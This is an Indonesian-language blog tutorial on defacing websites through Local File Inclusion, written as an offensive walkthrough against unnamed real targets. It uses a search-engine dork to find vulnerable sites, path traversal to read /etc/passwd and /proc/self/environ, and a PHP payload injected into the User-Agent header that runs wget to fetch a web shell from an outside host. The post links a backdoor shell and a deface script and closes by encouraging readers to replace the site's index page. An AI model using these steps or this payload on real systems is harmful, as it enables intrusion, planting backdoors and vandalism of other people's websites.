Lompat ke konten Lompat ke sidebar Lompat ke footer

Widget Atas Posting

Tutorial deface menggunakan poc LFI

 



Hallo :)

Pada peluang kali ini saya bakal coba mengimplementasikan bagaimana caranya mengexploitasi terhadap website tujuan yang rentan terhadap serangan LFI atau mampu disebut termasuk bersama Local File Inclusion.


Oke tak usah berlalu-lama, kami langsung saja ya...


Hal yang pertama adalah mencari tujuan yang vulnerable terhadap serangan LFI. Kalian mampu memanfatkan search engine layaknya google, bing, atau yang lainya bersama dork, perumpamaan dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar meraih yang terlalu vuln.


Tapi di sini saya sudah memiliki tujuan yang siap untuk dieksekusi, tapi saya tidak bakal saya sebutkan nama websitenya,  perumpamaan tujuan saya layaknya ini...


Jika kalian belum punya Shell backdoor dan script deface kalian bisa download dulu melalui link dibawah ini :


Shell backdoor : Klik Me 

Script deface : Klik Me


 

https://contoh.com/?file=college.php


Target sudah ada, kemudian coba ubah "college.php" bersama "../../../" perumpamaan lengkapnya bakal layaknya ini..

https://contoh.com/?file=../../../

Setelah saya klik enter, tapi di sini saya tidak meraih pesan error dengan sebutan lain hanya blank warna putih gitu. Entah ini vuln atau tidak saya termasuk agak begitu kurang paham.


Ok gamasalah, coba iseng-iseng menganti "../../../" bersama layaknya ini "/etc/passwd" perumpamaan layaknya ini...

https://contoh.com/?file=/etc/passwd

Tapi lagi-lagi di sini tidak meraih apa-apa, penampilan hanya menampkan blank warna putih, shit!



 

Mikir sebentar, kemudian di sini saya coba menaikan directorynya. Contoh layaknya ini..

https://contoh.com/?file=../etc/passwd > blank

https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank

Tapi kemudian terhadap pas saya menaikan directorynya pas ke tiga, sepetti ini...

https://contoh.com/?file=../../../etc/passwd

Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...




Selanjutnya saya bakal coba mengecheck /proc/self/environ apakah mampu diakses atau tidak? Sekarang ubah "/etc/passwd" bersama "/proc/self/environ" selanjutnya jalankan..

https://contoh.com/?file=../../../proc/self/environ

Mantul mantap betul ternyata berhasil membaca filenya, layaknya ini...




Yeah, /proc/self/environ berhasil diakses. Tapi terkecuali kalian terhadap pas mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak mampu diakses, atau barangkali itu beroperating system *BSD.


Sekarang seterusnya mari kami injeksi bersama malicious code bersama meracuni  terhadap bagian http headernya. Kalian mampu mengunakan addon tamper information mozilla firefox.

Caranya membuka tamper information di mozilla firefox kemudian selanjutnya masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" selanjutnya terhadap bagian user-agent isikian code layaknya tersebut ini...


<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>


lalu klik submit.


Ok injeksi malicious code selesai, bila berhasil letak shellnya berada terhadap directory berikut...


https://contoh.com/shell.php 



Setelah Shell berhasil di akses terserah kalian mau diapain, saran mending deface saja jangan aneh-aneh kasian yang punya website:v kalau mau tebas index backup dulu ya, atau ganti saja file index.php saja.

Posting Komentar untuk "Tutorial deface menggunakan poc LFI"